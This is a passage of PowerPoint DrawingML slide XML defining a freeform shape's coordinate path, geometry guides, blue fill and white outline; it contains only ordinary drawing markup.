                    <a:lnTo>
                      <a:pt x="37" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="63"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36363" name="Freeform 95"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3839" y="2183"/>
                <a:ext cx="174" cy="84"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 174"/>
                  <a:gd name="T1" fmla="*/ 63 h 84"/>
                  <a:gd name="T2" fmla="*/ 36 w 174"/>
                  <a:gd name="T3" fmla="*/ 63 h 84"/>
                  <a:gd name="T4" fmla="*/ 41 w 174"/>
                  <a:gd name="T5" fmla="*/ 63 h 84"/>
                  <a:gd name="T6" fmla="*/ 47 w 174"/>
                  <a:gd name="T7" fmla="*/ 59 h 84"/>
                  <a:gd name="T8" fmla="*/ 51 w 174"/>
                  <a:gd name="T9" fmla="*/ 57 h 84"/>
                  <a:gd name="T10" fmla="*/ 56 w 174"/>
                  <a:gd name="T11" fmla="*/ 57 h 84"/>
                  <a:gd name="T12" fmla="*/ 62 w 174"/>
                  <a:gd name="T13" fmla="*/ 52 h 84"/>
                  <a:gd name="T14" fmla="*/ 54 w 174"/>
                  <a:gd name="T15" fmla="*/ 50 h 84"/>
                  <a:gd name="T16" fmla="*/ 47 w 174"/>
                  <a:gd name="T17" fmla="*/ 47 h 84"/>
                  <a:gd name="T18" fmla="*/ 46 w 174"/>
                  <a:gd name="T19" fmla="*/ 44 h 84"/>
                  <a:gd name="T20" fmla="*/ 41 w 174"/>
                  <a:gd name="T21" fmla="*/ 39 h 84"/>
                  <a:gd name="T22" fmla="*/ 38 w 174"/>
                  <a:gd name="T23" fmla="*/ 39 h 84"/>
                  <a:gd name="T24" fmla="*/ 35 w 174"/>
                  <a:gd name="T25" fmla="*/ 44 h 84"/>
                  <a:gd name="T26" fmla="*/ 25 w 174"/>
                  <a:gd name="T27" fmla="*/ 41 h 84"/>
                  <a:gd name="T28" fmla="*/ 20 w 174"/>
                  <a:gd name="T29" fmla="*/ 39 h 84"/>
                  <a:gd name="T30" fmla="*/ 15 w 174"/>
                  <a:gd name="T31" fmla="*/ 36 h 84"/>
                  <a:gd name="T32" fmla="*/ 20 w 174"/>
                  <a:gd name="T33" fmla="*/ 31 h 84"/>
                  <a:gd name="T34" fmla="*/ 25 w 174"/>
                  <a:gd name="T35" fmla="*/ 28 h 84"/>
                  <a:gd name="T36" fmla="*/ 30 w 174"/>
                  <a:gd name="T37" fmla="*/ 24 h 84"/>
                  <a:gd name="T38" fmla="*/ 27 w 174"/>
                  <a:gd name="T39" fmla="*/ 21 h 84"/>
                  <a:gd name="T40" fmla="*/ 32 w 174"/>
                  <a:gd name="T41" fmla="*/ 11 h 84"/>
                  <a:gd name="T42" fmla="*/ 48 w 174"/>
                  <a:gd name="T43" fmla="*/ 10 h 84"/>
                  <a:gd name="T44" fmla="*/ 65 w 174"/>
                  <a:gd name="T45" fmla="*/ 15 h 84"/>
                  <a:gd name="T46" fmla="*/ 69 w 174"/>
                  <a:gd name="T47" fmla="*/ 5 h 84"/>
                  <a:gd name="T48" fmla="*/ 82 w 174"/>
                  <a:gd name="T49" fmla="*/ 1 h 84"/>
                  <a:gd name="T50" fmla="*/ 99 w 174"/>
                  <a:gd name="T51" fmla="*/ 8 h 84"/>
                  <a:gd name="T52" fmla="*/ 112 w 174"/>
                  <a:gd name="T53" fmla="*/ 6 h 84"/>
                  <a:gd name="T54" fmla="*/ 128 w 174"/>
                  <a:gd name="T55" fmla="*/ 7 h 84"/>
                  <a:gd name="T56" fmla="*/ 147 w 174"/>
                  <a:gd name="T57" fmla="*/ 7 h 84"/>
                  <a:gd name="T58" fmla="*/ 159 w 174"/>
                  <a:gd name="T59" fmla="*/ 13 h 84"/>
                  <a:gd name="T60" fmla="*/ 167 w 174"/>
                  <a:gd name="T61" fmla="*/ 17 h 84"/>
                  <a:gd name="T62" fmla="*/ 174 w 174"/>
                  <a:gd name="T63" fmla="*/ 23 h 84"/>
                  <a:gd name="T64" fmla="*/ 164 w 174"/>
                  <a:gd name="T65" fmla="*/ 28 h 84"/>
                  <a:gd name="T66" fmla="*/ 149 w 174"/>
                  <a:gd name="T67" fmla="*/ 36 h 84"/>
                  <a:gd name="T68" fmla="*/ 136 w 174"/>
                  <a:gd name="T69" fmla="*/ 47 h 84"/>
                  <a:gd name="T70" fmla="*/ 122 w 174"/>
                  <a:gd name="T71" fmla="*/ 45 h 84"/>
                  <a:gd name="T72" fmla="*/ 114 w 174"/>
                  <a:gd name="T73" fmla="*/ 59 h 84"/>
                  <a:gd name="T74" fmla="*/ 101 w 174"/>
                  <a:gd name="T75" fmla="*/ 61 h 84"/>
                  <a:gd name="T76" fmla="*/ 97 w 174"/>
                  <a:gd name="T77" fmla="*/ 56 h 84"/>
                  <a:gd name="T78" fmla="*/ 73 w 174"/>
                  <a:gd name="T79" fmla="*/ 71 h 84"/>
                  <a:gd name="T80" fmla="*/ 69 w 174"/>
                  <a:gd name="T81" fmla="*/ 79 h 84"/>
                  <a:gd name="T82" fmla="*/ 60 w 174"/>
                  <a:gd name="T83" fmla="*/ 81 h 84"/>
                  <a:gd name="T84" fmla="*/ 48 w 174"/>
                  <a:gd name="T85" fmla="*/ 84 h 84"/>
                  <a:gd name="T86" fmla="*/ 43 w 174"/>
                  <a:gd name="T87" fmla="*/ 81 h 84"/>
                  <a:gd name="T88" fmla="*/ 40 w 174"/>
                  <a:gd name="T89" fmla="*/ 79 h 84"/>
                  <a:gd name="T90" fmla="*/ 36 w 174"/>
                  <a:gd name="T91" fmla="*/ 77 h 84"/>
                  <a:gd name="T92" fmla="*/ 29 w 174"/>
                  <a:gd name="T93" fmla="*/ 78 h 84"/>
                  <a:gd name="T94" fmla="*/ 25 w 174"/>
                  <a:gd name="T95" fmla="*/ 80 h 84"/>
                  <a:gd name="T96" fmla="*/ 20 w 174"/>
                  <a:gd name="T97" fmla="*/ 76 h 84"/>
                  <a:gd name="T98" fmla="*/ 11 w 174"/>
                  <a:gd name="T99" fmla="*/ 77 h 84"/>
                  <a:gd name="T100" fmla="*/ 1 w 174"/>
                  <a:gd name="T101" fmla="*/ 77 h 84"/>
                  <a:gd name="T102" fmla="*/ 1 w 174"/>
                  <a:gd name="T103" fmla="*/ 71 h 84"/>
                  <a:gd name="T104" fmla="*/ 5 w 174"/>
                  <a:gd name="T105" fmla="*/ 70 h 84"/>
                  <a:gd name="T106" fmla="*/ 6 w 174"/>
                  <a:gd name="T107" fmla="*/ 66 h 84"/>
                  <a:gd name="T108" fmla="*/ 20 w 174"/>
                  <a:gd name="T109" fmla="*/ 67 h 84"/>
                  <a:gd name="T110" fmla="*/ 22 w 174"/>
                  <a:gd name="T111" fmla="*/ 66 h 84"/>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174"/>
                  <a:gd name="T169" fmla="*/ 0 h 84"/>
                  <a:gd name="T170" fmla="*/ 174 w 174"/>
                  <a:gd name="T171" fmla="*/ 84 h 84"/>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174" h="84">
                    <a:moveTo>
                      <a:pt x="28" y="63"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="28" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="63"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
